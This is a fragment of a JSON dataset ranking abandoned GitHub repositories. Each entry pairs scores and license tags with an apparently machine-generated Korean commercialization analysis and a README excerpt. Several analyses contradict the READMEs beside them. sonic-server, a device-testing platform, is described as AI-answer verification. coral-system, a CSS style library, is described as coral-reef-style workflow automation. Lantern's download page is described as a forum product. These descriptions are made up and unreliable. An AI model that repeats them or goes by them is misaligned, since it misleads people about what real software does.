src=\"Manual/Images_jpg/UTS2_TopImage00.jpg\">\n\n***Read this document in other languages: [日本語版](./README_ja.md)***  \n\n\n## 2024/01/26: Information\nWe appreciate your interest in Unity-Chan Toon Shader 2.0.\nIt's important to note that this package has been succeeded by [Unity Toon Shader](https://docs.unity3d.com/Packages/com.unity.toonshader@0.9/manual/index.html) and is provided as is, without any maintenance or release plan.\nTherefore, we are unable to monitor bug reports, accept feature requests, or review pull requests for this package.\n\nHowever, we understand that users may want to continue using and improving Unity-Chan Toon Shader 2.0, instead of upgrading to Unity Toon Shader.\nIn that case, we recommend that you fork the repository. This will allow you to make changes and enhancements as you see fit.\n\n\n\n## 2022/06/14: 2.0.9 Release: new features added.    \n* Changed release environment to Unity 2019.4.31f1, t","composite_score":0.4225,"license_safety_tag":"unknown"},{"name":"ityouknow/spring-cloud-examples","github_url":"https://github.com/ityouknow/spring-cloud-examples","stars":5,"language":"Java","license":"unknown","abandonment_months":35,"description":"# Spring Cloud Examples 평가 보고서\n\n## 왜 보물인가\n여러 회사의 시스템을 연결하는 '클라우드 기술'의 실제 사용 예시를 보여주는 교육용 자료로, 기업들이 복잡한 시스템 구축 시 참고할 수 있는 실용적인 가이드입니다.\n\n## 어디에 쓸 수 있나\n- **기업용 SaaS**: 여러 팀의 업무 시스템을 하나로 연결하는 통합 플랫폼 개발\n- ","readme_excerpt":"# Spring Cloud Examples\n\nSpring Cloud 使用的各种示例，以最简单、最实用为标准\n\n[Spring Cloud 中文索引](https://github.com/ityouknow/awesome-spring-cloud)  &nbsp;| &nbsp; [Spring Boot学习示例代码](https://github.com/ityouknow/spring-boot-examples)  &nbsp;| &nbsp; [参与贡献](https://github.com/ityouknow/spring-cloud-examples/issues)\n\n[English](README_EN.md) &nbsp;| &nbsp; **[github地址](https://github.com/ityouknow/spring-cloud-examples)**  &nbsp;| &nbsp; **[码云地址](https://gitee.com/ityouknow/spring-cloud-examples)**\n\n\n推荐程序员都关注的一个漫画公众号\n\n![](http://www.ityouknow.com/assets/images/cartoon.jpg)\n\n关注后，回复：**java** 获取超过 10万 人领取的 Java 知识体系/面试必看资料。\n\n\n\nSpring Cloud 使用的各种示例，以最简单、最实用为标准\n\n**[Spring Boot 2.0 最全使用教程](https://github.com/ityouknow/spring-boot-leaning)**\n\n- [spring-cloud-eureka](https://github.com/ityouknow/spring-cloud-examples/tree/master/spring-cloud-eureka)：eureka server单机、双机、集群示例\n- [eureka-producer-consumer](https://github.com/ityouknow/spring-cloud-examples/tree/master/eureka-producer-consumer)：利用eureka实现服务提供与调用示例\n- [s","composite_score":0.4224,"license_safety_tag":"unknown"},{"name":"francistao/LearningNotes","github_url":"https://github.com/francistao/LearningNotes","stars":5,"language":"","license":"unknown","abandonment_months":22,"description":"# francistao/LearningNotes 분석\n\n## 왜 보물인가\n개인의 학습 노트를 체계적으로 정리하고 공유할 수 있는 템플릿 또는 도구로, 평생학습 시대에 누구나 자신의 지식을 효과적으로 관리하고 타인과 나눌 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **교육 플랫폼(SaaS)**: 학생과 직장인이 강의를 듣고 자동으로 정리된 노트를 받는","readme_excerpt":"# LearningNotes\n  ---\n\n## 第一部分：\n\n* [Android(安卓)](https://github.com/GeniusVJR/LearningNotes/tree/master/Part1/Android)\n\n    * [Android基础知识](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Android基础知识.md)\n    * [Android内存泄漏总结](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Android内存泄漏总结.md)\n    * [Handler内存泄漏分析及解决](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Handler内存泄漏分析及解决.md)\n    * [Handler、Looper、Message、MessageQueue基础流程分析](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/线程通信基础流程分析.md)\n    * [Android性能优化](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Android性能优化.md)\n    * [ListView详解](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Listview详解.md)\n    * [RecyclerView和ListView的异同](https://github.com/GeniusVJR/LearningNotes/blob/master/Part1/Android/Recyclerview和Listview的异同.md)\n    * [AsyncTask源码分析](https://github.com/GeniusVJR/LearningNotes/blob/master/P","composite_score":0.4224,"license_safety_tag":"unknown"},{"name":"hackware1993/MagicIndicator","github_url":"https://github.com/hackware1993/MagicIndicator","stars":5,"language":"Java","license":"unknown","abandonment_months":18,"description":"# MagicIndicator 상용화 분석\n\n## 왜 보물인가\n웹사이트와 앱에서 사용자의 현재 위치나 진행 상황을 시각적으로 보여주는 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 온라인 교육 플랫폼에서 학습 진행률 표시, 여행 예약 앱에서 예약 단계별 진행 현황 표시\n2. **내부 업무 도구**: 회사의","readme_excerpt":"# MagicIndicator\n\nA powerful, customizable and extensible ViewPager indicator framework. As the best alternative of ViewPagerIndicator, TabLayout and PagerSlidingTabStrip.\n\n[Flutter_ConstraintLayout](https://github.com/hackware1993/Flutter_ConstraintLayout) Another very good open source project of mine.\n\n**I have developed the world's fastest general purpose sorting algorithm, which is on average 3 times faster than Quicksort and up to 20 times faster**, [ChenSort](https://github.com/hackware1993/ChenSort)\n\n[![](https://jitpack.io/v/hackware1993/MagicIndicator.svg)](https://jitpack.io/#hackware1993/MagicIndicator)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MagicIndicator-green.svg?style=true)](https://android-arsenal.com/details/1/4252)\n[![Codewake](https://www.codewake.com/badges/ask_question.svg)](https://www.codewake.com/p/magicindicator)\n\n![magicindicaotor.gif](https://github.com/hackware1993/MagicIndicator/blob/main/magicindicator.gif)\n\n# Usage\n\nSimple step","composite_score":0.4224,"license_safety_tag":"unknown"},{"name":"ZhouYixun/sonic-server","github_url":"https://github.com/ZhouYixun/sonic-server","stars":7,"language":"Java","license":"AGPL-3.0","abandonment_months":14,"description":"# sonic-server 상업화 분석\n\n## 왜 보물인가\nAI가 생성한 답변의 정확성을 자동으로 검증하는 기술로, 챗봇·검색·추천 서비스의 신뢰도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. AI 챗봇 검증 서비스 (SaaS)**\n- 기업 고객사의 챗봇에 플러그인 형태로 제공하여 월 단위로 청구\n\n**2. 의료/법률 AI 솔루션 ","readme_excerpt":"<p align=\"center\">\r\n  <img width=\"80px\" src=\"https://raw.githubusercontent.com/SonicCloudOrg/sonic-server/main/logo.png\">\r\n</p>\r\n<p align=\"center\">🎉Sonic Cloud Real Machine Platform</p>\r\n<p align=\"center\">\r\n  <span>English |</span>\r\n  <a href=\"https://github.com/SonicCloudOrg/sonic-server/blob/main/README_CN.md\">  \r\n     简体中文\r\n  </a>\r\n</p>\r\n<p align=\"center\">\r\n<a href='https://gitee.com/sonic-cloud/sonic-server/stargazers'><img src='https://gitee.com/sonic-cloud/sonic-server/badge/star.svg?theme=gvp' alt='star'></img></a>\r\n  <a href=\"#\">  \r\n    <img src=\"https://img.shields.io/github/v/release/SonicCloudOrg/sonic-server?include_prereleases\">\r\n  </a>\r\n  <a href=\"#\">  \r\n    <img src=\"https://img.shields.io/github/commit-activity/m/SonicCloudOrg/sonic-agent\">\r\n  </a>\r\n  <a href=\"https://github.com/SonicCloudOrg/sonic-server/blob/main/LICENSE\">  \r\n    <img src=\"https://img.shields.io/github/license/SonicCloudOrg/sonic-server?color=green&label=license&logo=license&logoColor=green\">\r\n  </a>\r","composite_score":0.4224,"license_safety_tag":"risky"},{"name":"levjj/esverify","github_url":"https://github.com/levjj/esverify","stars":35,"language":"TypeScript","license":"mit","abandonment_months":24,"description":"# levjj/esverify 상용화 분석\n\n## 왜 보물인가\nAI가 만든 답변이 정말 맞는지 자동으로 검증해주는 도구로, 잘못된 정보를 제공하는 AI의 신뢰성 문제를 직접 해결합니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 챗봇 SaaS**: 고객센터 자동응답이나 AI 어시스턴트 서비스에 내장하여 잘못된 답변 자동 필터링\n2. **법무/의료 검증 시스","readme_excerpt":"# esverify\n\n[![Build Status](https://api.travis-ci.com/levjj/esverify.svg?branch=master)](https://travis-ci.com/levjj/esverify)\n[![NPM Version](https://img.shields.io/npm/v/esverify.svg)](https://www.npmjs.com/package/esverify)\n\nProgram Verification for ECMAScript/JavaScript ([esverify.org](http://esverify.org/)).\n\n**Alpha: This is still a research prototype and not yet ready for production use.**\n\n## Documentation\n\nA detailed documentation of esverify and its theoretical foundations is\ncurrently work-in-progress and will be published soon.\n\n## Example\n\nGiven a simple JavaScript `max` function, we can add pre- and post-conditions\nusing special pseudo-calls to `requires` and `ensures` with boolean expressions.\n\n```js\nfunction max(a, b) {\n  requires(typeof a === \"number\");\n  requires(typeof b === \"number\");\n  ensures(res => res >= a);\n\n  if (a >= b) {\n    return a;\n  } else {\n    return b;\n  }\n}\n```\n\nThese expressions will then be statically verified with respect to the function\nbody wit","composite_score":0.4218,"license_safety_tag":"safe"},{"name":"akveo/blur-admin","github_url":"https://github.com/akveo/blur-admin","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":29,"description":"# Blur Admin 저장소 분석\n\n## 왜 보물인가\n회사나 조직의 업무 관리를 위한 깔끔한 대시보드 디자인을 빠르게 만들 수 있는 완성된 틀입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업을 위한 간단한 관리 시스템(매출 현황, 직원 관리, 일정 추적)을 빠르게 출시\n2. **내부 업무 도구**: 대기업의 부서별 데이터 분석 ","readme_excerpt":"[![Build Status](https://travis-ci.org/akveo/blur-admin.svg?branch=master)](https://travis-ci.org/akveo/blur-admin)\n\n# BlurAdmin Angular admin panel front-end framework\n\nCustomizable admin panel framework made with :heart: by [Akveo team](http://akveo.com/). Follow us on [Twitter](https://twitter.com/akveo_inc) to get latest news about this template first!\n\n### Demo\n**[Mint version demo](http://akveo.com/blur-admin-mint/)**             |  **[Blur version demo](http://akveo.com/blur-admin/)**\n:-------------------------:|:-------------------------:\n![Mint version demo](http://i.imgur.com/A3TMviJ.png)  |  ![Blur version demo](http://i.imgur.com/EAoiK2O.jpg)\n\n## Angular 2 version\nHere you can find Angular2 based version: [ng2-admin](https://github.com/akveo/ng2-admin).\n\n### Documentation\nInstallation, customization and other useful articles: https://akveo.github.io/blur-admin/\n\n*If you have problems installing and just want to download JS and css files, you can find download links here*: h","composite_score":0.4214,"license_safety_tag":"unknown"},{"name":"testing-library/react-hooks-testing-library","github_url":"https://github.com/testing-library/react-hooks-testing-library","stars":6,"language":"TypeScript","license":"mit","abandonment_months":28,"description":"# React Hooks Testing Library 상용화 분석\n\n## 왜 보물인가\n개발자들이 새로운 기능을 만들 때 제대로 작동하는지 확인하는 과정을 자동화해주는 도구로, 소프트웨어 품질을 높이면서 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션 개발 회사가 자체 개발 팀의 생산성 향상을 위해 ","readme_excerpt":"<div align=\"center\">\n  <h1>react-hooks-testing-library</h1>\n\n<a href=\"https://www.emojione.com/emoji/1f40f\">\n  <img\n    height=\"80\"\n    width=\"80\"\n    alt=\"ram\"\n    src=\"https://raw.githubusercontent.com/testing-library/react-hooks-testing-library/main/public/ram.png\"\n  />\n</a>\n\n<p>Simple and complete React hooks testing utilities that encourage good testing practices.</p>\n\n  <br />\n  <a href=\"https://react-hooks-testing-library.com/\"><strong>Read The Docs</strong></a>\n  <br />\n</div>\n\n<hr />\n\n<!-- prettier-ignore-start -->\n[![Build Status](https://img.shields.io/github/workflow/status/testing-library/react-hooks-testing-library/validate?logo=github&style=flat-square)](https://github.com/testing-library/react-hooks-testing-library/actions?query=workflow%3Avalidate)\n[![codecov](https://img.shields.io/codecov/c/github/testing-library/react-hooks-testing-library.svg?style=flat-square)](https://codecov.io/gh/testing-library/react-hooks-testing-library)\n[![version](https://img.shields.io/np","composite_score":0.4208,"license_safety_tag":"safe"},{"name":"designmodo/Flat-UI","github_url":"https://github.com/designmodo/Flat-UI","stars":13,"language":"JavaScript","license":"MIT","abandonment_months":11,"description":"# Flat-UI 상용화 분석\n\n## 왜 보물인가\n웹사이트나 앱을 만들 때 필요한 깔끔하고 현대적인 디자인 부품들을 무료로 제공하는 도구라, 누구나 전문가 수준의 디자인을 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **저가 웹사이트 빌더 SaaS**: 예산이 적은 소상공인들이 직접 홈페이지를 만들 수 있는 온라인 플랫폼으로 제공\n2. **기업","readme_excerpt":"\n# [Flat UI Free](https://designmodo.github.io/Flat-UI/)\n\nFlat UI is a beautiful theme for Bootstrap. We have redesigned many of its components to look flat in every pixel.\n\nTo get started, check out [getting started page](https://designmodo.github.io/Flat-UI/docs/getting-started.html) or follow instructions below.\n\n## Links:\n\n+ [Demo Page](https://designmodo.github.io/Flat-UI/)\n+ [Download PSD](https://designmodo.com/flat-free/)\n\n## Quick start\n\nThree quick start options are available:\n\n- [Download the latest release](https://github.com/designmodo/Flat-UI/archive/2.3.0.zip).\n- Clone the repo: `git clone https://github.com/designmodo/Flat-UI.git`.\n- Install with [Bower](http://bower.io): `bower install flat-ui`.\n\nRun `npm install` and `bower install` to install dependencies.\n\nRead the [getting started page](https://designmodo.github.io/Flat-UI/docs/getting-started.html) for information on the framework contents.\n\nExamples: <https://github.com/designmodo/Flat-UI/tree/master/docs/example","composite_score":0.4205,"license_safety_tag":"safe"},{"name":"0voice/from_coder_to_expert","github_url":"https://github.com/0voice/from_coder_to_expert","stars":5,"language":"","license":"unknown","abandonment_months":25,"description":"# 0voice/from_coder_to_expert 분석\n\n## 왜 보물인가\n프로그래밍 초보자가 전문가 수준으로 성장하기 위한 체계적인 학습 경로와 실전 자료들을 한곳에 모아놓은 로드맵입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 월 구독형 코딩 교육 사이트에서 학습 커리큘럼으로 판매\n2. **기업 직원 교육 프로그램**: IT 회","readme_excerpt":"### 2021年最新总结，从程序员到CTO，从专业走向卓越，企业内部分享文档pdf与PPT整理\n\n### 整理大牛分享文档如下，持续更新一线开发架构，技术文档\n##### 网易蜂巢公有容器云架构之路\n##### 新浪微博redis优化历程\n##### 微博Cache架构设计实践\n##### Go在大数据开发中的经验总结\n##### 基于Go构建滴滴核心业务平台的实践\n##### 京东分布式K-V存储设计与挑战\n##### 去哪网数据库架构发展历程\n##### 58速运数据库降压优化实践\n##### 云时代的数据库演变之路\n##### 阿里万亿级数据洪峰下的消息引擎\n##### 小米生态云应用引擎实践\n##### 去哪儿网基于Mesos Docker的Elasticsearch容器化私有云\n##### 滴滴统一资源调度平台建设实践\n##### 亚马逊云平台计算服务进化之路\n##### 京东云为企业提供智能化之路\n##### 中移苏研存储产品化之路\n##### 百度基于Druid的大数据采集即计算实践\n##### 蘑菇街大数据平台工作流调度系统\n##### 饿了么离线大数据平台实践\n##### 爱奇艺广告大数据实践\n##### 魅族Android多分支代码自动同步\n##### 闲鱼2亿用户架构实践\n##### 美团配送移动网关建设实战\n##### 京东图片系统演进\n##### 360云端图像技术的深度学习模型与应用\n##### 腾讯优图深度学习在图像审核的应用\n##### 上汽时代站在云时代的路口\n##### 中石油大型企业云平台架构演进的实践之路\n##### 机器学习和未知样本检测\n##### 瓜子云的技术架构落地方案\n##### 分布式存储优化与离线混布弹性计算平台\n##### Event sourcing & CQRS, architecting a cloud based micro-service system\n##### 360基础架构大容量redis存储方案--Pika\n##### 财付通交易核心演进之路\n##### 京东金融数据库多场景架构实践\n##### 摩拜开源技术的线上应用之路\n##### AI领域的人机识别对抗 千亿美金的验证码攻防\n##### 苏宁潜行狙击--业务安全大数据融合\n##### 腾讯全民K歌黑产对抗之路\n##### 阿里面向未来的","composite_score":0.4202,"license_safety_tag":"unknown"},{"name":"dovpanda-dev/dovpanda","github_url":"https://github.com/dovpanda-dev/dovpanda","stars":5,"language":"Python","license":"BSD-3-Clause","abandonment_months":18,"description":"# dovpanda 상용화 분석\n\n## 왜 보물인가\n데이터 분석가들이 자주 실수하는 오류를 자동으로 찾아주는 똑똑한 도우미 같은 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 분석 교육 SaaS**: 대학원과 부트캠프에서 학생들의 코드를 자동 검사하는 수업 지원 플랫폼\n2. **기업 내부 분석 도구**: 금융사·마케팅팀의 데이터 담당자들이 실수를","readme_excerpt":"<h1><img src=\"https://github.com/dovpanda-dev/dovpanda/blob/master/img/logo.png\" alt=\"logo\" width=\"100\"> dovpanda </h1>\n\n\n[![pypi](https://img.shields.io/pypi/v/dovpanda.svg)](https://pypi.python.org/pypi/dovpanda)\n[![Build Status](https://travis-ci.org/dovpanda-dev/dovpanda.svg?branch=master)](https://travis-ci.org/dovpanda-dev/dovpanda)\n[![Documentation Status](https://readthedocs.org/projects/dovpanda/badge/?version=latest)](https://dovpanda.readthedocs.io/en/latest/?badge=latest)\n[![Updates](https://pyup.io/repos/github/dovpanda-dev/dovpanda/shield.svg)](https://pyup.io/repos/github/dovpanda-dev/dovpanda/)\n![python3](https://pyup.io/repos/github/dovpanda-dev/dovpanda/python-3-shield.svg?t=1572213773477)\n[![license](https://img.shields.io/pypi/l/pandas.svg)](https://github.com/dovpanda-dev/dovpanda/blob/master/LICENS)  \n[![Downloads](https://pepy.tech/badge/dovpanda)](https://pepy.tech/project/dovpanda)\n\n\n## Directions OVer PANDAs\n\nDirections are hints and tips for using pandas in a","composite_score":0.42,"license_safety_tag":"safe"},{"name":"getlantern/forum","github_url":"https://github.com/getlantern/forum","stars":60,"language":"","license":"unknown","abandonment_months":50,"description":"# Getlantern Forum 분석\n\n## 왜 보물인가\n온라인 커뮤니티를 쉽게 만들 수 있는 기성 솔루션으로, 직접 개발할 필요 없이 즉시 포럼을 운영할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업이나 단체가 자신의 고객/회원과 소통하는 전용 포럼을 월 구독으로 제공\n- **내부 업무 도구**: 회사 직원들 간 소통 및 지","readme_excerpt":"## 蓝灯(Lantern)最新版本下载 版本![](https://bitbucket.org/getlantern/lantern-binaries/raw/master/version.png)  Download Lantern Version ![](https://bitbucket.org/getlantern/lantern-binaries/raw/master/version.png)\n\n[Windows7及以上 Windows 7+](https://gitlab.com/getlantern/lantern-binaries-mirror/-/raw/master/lantern-installer.exe)      [备用地址1 Alternative address1](https://s3.amazonaws.com/lantern/lantern-installer.exe)  [备用地址2 Alternative address2](https://github.com/getlantern/lantern-binaries/raw/main/lantern-installer.exe)  \n\n\n[安卓版(4.1+) Android(4.1+)](https://gitlab.com/getlantern/lantern-binaries-mirror/-/raw/master/lantern-installer.apk)      [备用地址1 Alternative address1](https://s3.amazonaws.com/lantern/lantern-installer.apk)  [备用地址2 Alternative address2](https://github.com/getlantern/lantern-binaries/raw/main/lantern-installer.apk)  [Google Play](https://play.google.com/store/apps/details?id=org.getlantern.lantern) \n\n[iOS版本(12.1+) iOS(12.1+)ver5.9.6](https://apps.apple.com/app/id1457872372?","composite_score":0.42,"license_safety_tag":"unknown"},{"name":"sty945/bank_interview","github_url":"https://github.com/sty945/bank_interview","stars":13,"language":"","license":"unknown","abandonment_months":19,"description":"# bank_interview 저장소 분석\n\n## 왜 보물인가\n은행권 입사 시험과 면접을 준비하는 사람들을 위해 실제 출제 유형과 면접 질문을 정리한 학습 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **취업 준비 플랫폼**: 은행원 준비생들을 위한 구독형 면접 예상 질문 및 채용 정보 제공 서비스\n2. **기업 교육 솔루션**: 은행권 채용담당자가","readme_excerpt":"# 觉得不错，记得帮我点击一个**star**,据说点**star**的人最后都拿offer了\n# 前言\n\n我在 19 年的校招中获得到银行 offer 如下：\n- 中国交通银行总行软件中心\n- 中国银行软件中心\n- 中国农业银行数据中心\n- 中国工商银行北京分行\n- 中信银行总行信息科技部\n- 民生银行总行信息科技部\n\n所以说对银行的笔试、面试、待遇有着切身的了解，这是本人在准备当时银行笔试面试时候的一些资料，希望能对**投递银行信息科技岗**的同学有所帮助。\n\n其他的offer包括：\n- 新华社通信技术局\n- 公安部某研究所\n- 中国移动研究院\n- 中国联通联通网络技术研究院\n- 中国科学院 A 所\n- 中国科学院 B 所\n- 中国卫星通信集团\n- 中国民航信息网络股份有限公司\n- 搜狗公司\n\n\n# 目录结构\n- 0_基础知识资料\n    - 1.Java 基础_csdn_sty945.pdf\n    - 2.计算机网络_csdn_sty945.pdf\t\n    - 3.计算机操作系统_csdn_sty945.pdf\t\n    - 4.数据库系统原理_csdn_sty945.pdf\n- 1_笔试资料\n    - Hibernate常见笔试题_csdn_sty945.pdf\n    - 银行笔试-计算机知识部分_csdn_sty945.pdf\n    - JAVA高频笔试题_csdn_sty945.pdf （2019.10.23 更新）\n    - [银行笔试-英语常见金融相关单词_csdn_sty945.md](https://github.com/sty945/bank_interview/blob/master/1_%E7%AC%94%E8%AF%95%E8%B5%84%E6%96%99/%E9%93%B6%E8%A1%8C%E7%AC%94%E8%AF%95-%E8%8B%B1%E8%AF%AD%E5%B8%B8%E8%A7%81%E9%87%91%E8%9E%8D%E7%9B%B8%E5%85%B3%E5%8D%95%E8%AF%8D_csdn_sty945.md) （2021.08.02 更新）\n- 2_其他\n    - 解决北京户口企业合集_csdn_sty945.pdf\n    - [关于银行常见问题集锦_csdn_sty945.md](https","composite_score":0.4198,"license_safety_tag":"unknown"},{"name":"nanmu42/orly","github_url":"https://github.com/nanmu42/orly","stars":101,"language":"Go","license":"MIT","abandonment_months":21,"description":"# nanmu42/orly 분석\n\n## 왜 보물인가\n글로 쓴 내용을 자동으로 깔끔한 이미지로 변환해주는 도구로, 복잡한 기술 없이 누구나 전문가처럼 보이는 문서를 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기술 교육 SaaS**: 온라인 강의 플랫폼에서 강사들이 수업 자료를 빠르게 시각화하는 기능 판매\n2. **기업 내부 도구**: 마케팅·기획","readme_excerpt":"**English** | [中文](https://github.com/nanmu42/orly/blob/master/README_ZH.md)\n\n[![Build Status](https://github.com/nanmu42/orly/workflows/build/badge.svg)](https://github.com/nanmu42/orly/actions)\n[![Lint Status](https://github.com/nanmu42/orly/workflows/golangci-lint/badge.svg)](https://github.com/nanmu42/orly/actions)\n[![Docker Image](https://github.com/nanmu42/orly/workflows/Docker%20Image/badge.svg)](https://hub.docker.com/r/nanmu42/orly)\n[![Go Report Card](https://goreportcard.com/badge/github.com/nanmu42/orly)](https://goreportcard.com/report/github.com/nanmu42/orly)\n[![GoDoc](https://godoc.org/github.com/nanmu42/orly?status.svg)](https://godoc.org/github.com/nanmu42/orly)\n\n# O'RLY Cover Generator\n\nO'RLY Cover Generator is a parody book cover generator, implemented in Golang and Vue.js, supporting a wide range of language including CJK.\n\n[Go to the living demo](https://orly.nanmu.me/) to build your own O'RLY cover and troll your friends and colleagues.\n\n<table style=\"padding:10px\"","composite_score":0.4197,"license_safety_tag":"safe"},{"name":"sajalshres/django-debugger","github_url":"https://github.com/sajalshres/django-debugger","stars":7,"language":"Python","license":"MIT","abandonment_months":21,"description":"# django-debugger 상업화 분석\n\n## 왜 보물인가\nDjango(웹사이트 만드는 프로그램)에서 발생하는 오류를 빠르게 찾아주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: 학생들이 코드 오류를 쉽게 이해하도록 돕는 실시간 진단 기능 제공\n2. **개발사 내부 도구**: ","readme_excerpt":"# django-debugger\n\nA simple plugin to attach a debugger in Django during runserver\n\n## Installation\n\n```bash\npip install django-debugger\n```\n\n## Usage\n\n1. Prepend django_debugger to **top** of the **INSTALLED_APPS**\n\n    ```python\n\n    INSTALLED_APPS = [\n        \"django_debugger\",\n        ...\n    ]\n\n    # Or if you have multiple settings configuration\n    INSTALLED_APPS = [ \n        \"django_debugger\",\n        ... # custom development apps\n    ] + INSTALLED_APPS\n    ```\n\n2. Add `--enable-debugger` argument to runserver command\n\n    ```bash\n    python manage.py runserver ---enable-debugger 0.0.0.0:8000\n    ```\n\n    **OR**\n\n    Add `DEBUGGER_ENABLE = True` to settings file.\n\n## Settings Variables\n\n- `DEBUGGER_ENABLE = True` : Attaches debugger.\n- `DEBUGGER_ADDRESS = \"0.0.0.0\"` : Address to listen for remote debugging\n- `DEBUGGER_PORT = 5678` : Port to listen for remote debugging\n- `DEBUGGER_WAIT_FOR_ATTACH = False` : Wait for debugger to attach before continuing.\n","composite_score":0.4194,"license_safety_tag":"safe"},{"name":"wwsun/coral-system","github_url":"https://github.com/wwsun/coral-system","stars":6,"language":"TypeScript","license":"MIT","abandonment_months":21,"description":"# Coral System 상용화 분석\n\n## 왜 보물인가\n산호초 생태계처럼 다양한 요소들이 유기적으로 연결되는 시스템을 구축할 수 있어, 복잡한 업무 프로세스를 자동으로 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 회사들이 자신의 업무 흐름을 자동화할 수 있는 클라우드 기반 플랫폼으로 판매\n2. **내부 업무 도구*","readme_excerpt":"# coral-system\n\n<img src=\"https://user-images.githubusercontent.com/6984035/160110646-2e95c392-7f29-48f3-8970-f07a86b57553.png\" alt=\"coral\" height=\"100px\">\n\n一个轻量级的样式系统和 React 布局原子组件库。\n\n文档地址：https://wwsun.github.io/coral-system/\n\n## Features\n\n- [x] 原子化 css 生成\n- [x] 支持 css in js\n- [x] 支持 css variables\n- [x] 支持 prefix 自定义\n- [x] 提供标准化的 Design Token 支持\n- [x] css 传入自定义属性 `css={css}`\n- [x] css 逻辑的动态表达 `css=[css1, css2]`\n- [x] Coral Factory: ` coral('input', css``, { prefix: '' }); `\n- [ ] 提供 FusionDesign 主题的导入支持\n- [ ] 提供 Antd 主题的导入支持\n- [ ] 响应式支持\n- [ ] 常用伪类支持 \\_hover...\n\n## Usage\n\n```tsx\nimport { Box, SystemProvider } from 'coral-system';\n\nfunction App() {\n  return (\n    <SystemProvider prefix=\"--coral\" theme={YOUR_THEME}>\n      <Box>hello</Box>\n    </SystemProvider>\n  );\n}\n```\n\n### Factory\n\n使用 coral 方法可以创建具备 style props 的组件。\n\n```tsx\nimport { coral, css } from 'coral-system';\n\nconst Section = coral('section', css`\n  /* your initial style */\n`);\n\nfunction App() {\n  return <Section bg=\"brand\">he","composite_score":0.4194,"license_safety_tag":"safe"},{"name":"MariaLetta/free-gophers-pack","github_url":"https://github.com/MariaLetta/free-gophers-pack","stars":5,"language":"Go","license":"CC0-1.0","abandonment_months":17,"description":"# MariaLetta/free-gophers-pack 상업화 분석\n\n## 왜 보물인가\n무료로 사용할 수 있는 고품질 고퍼(Gopher) 캐릭터 이미지 팩으로, 웹사이트나 앱을 만드는 사람들이 별도의 비용 없이 귀여운 일러스트를 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 커뮤니티 플랫폼 SaaS**: 프로그래밍 학습 사이트에서 고퍼 캐","readme_excerpt":"# Free Gophers Pack\n\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge-flat.svg)](https://github.com/avelino/awesome-go)\n\n![alt](/preview/main.png)\n\n🌟🌈 💗 Meet the New Emotional Gophers! 💗🌈🌟   \nThis pack of __100+__ gopher pictures and elements will help you to build own design of almost anything related to Go Programming Language: presentations, posts in blogs or social media, courses, videos and many, many more. 😉\n\n![alt](/preview/1.png)\n\n\n## Messengers\n1. Telegram - [Free Gophers Pack](https://t.me/addstickers/Free_Gophers_Pack)\n\n\n## Shop\n\n![alt](/preview/shop_presentation.png)\n\n\nIf you want some fun gophers __t-shirts, mugs, stickers on a laptop__ - now you can buy them with delivery to any place around the world:  \n✨👉 https://gophers.threadless.com/ 👈✨\n\n  Of course there are some nice deals in the shop, for example free shipping and so on.\n\n## Contents\n\n0. [Examples](/examples/)\n1. [Characters](/characters/) __- UPDATED__\n2. [Goroutines](/goroutines/) __- UPDATED__\n3. ","composite_score":0.4193,"license_safety_tag":"unknown"},{"name":"udacity/cd0157-Server-Deployment-and-Containerization","github_url":"https://github.com/udacity/cd0157-Server-Deployment-and-Containerization","stars":76,"language":"Python","license":"NOASSERTION","abandonment_months":26,"description":"","readme_excerpt":"","composite_score":0.4193,"license_safety_tag":"unknown"},{"name":"lucent-sea/Remotely","github_url":"https://github.com/lucent-sea/Remotely","stars":73,"language":"C#","license":"GPL-3.0","abandonment_months":17,"description":"# Remotely 프로젝트 분석\n\n## 왜 보물인가\n누구나 어디서나 다른 컴퓨터를 원격으로 제어하고 지원할 수 있는 무료 도구로, 기업의 IT 지원 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 원격 기술 지원이 필요한 기업들을 위해 \"클라우드 기반 원격 접속 서비스\"로 월 구독 판매\n2. **내부 업무 도구**","readme_excerpt":"# Remotely\n\nA remote control and remote scripting solution, built with .NET, Blazor, and SignalR Core.\n\n[![Build Status](https://dev.azure.com/immybot/Remotely/_apis/build/status%2Fimmense.Remotely?branchName=master)](https://dev.azure.com/immybot/Remotely/_build/latest?definitionId=2&branchName=master)\n[![Tests](https://github.com/immense/Remotely/actions/workflows/run_tests.yml/badge.svg?branch=master)](https://github.com/immense/Remotely/actions/workflows/run_tests.yml)\n\n## Project Links\n\nSubreddit: https://www.reddit.com/r/remotely_app/  \nDocker: https://hub.docker.com/r/immybot/remotely  \nTutorial: https://www.youtube.com/watch?v=t-TFvr7sZ6M (Thanks, @bmcgonag!)\n\n![image](.github/media/ask-remote.png)\n\n## Quickstart\n\n```\nmkdir -p 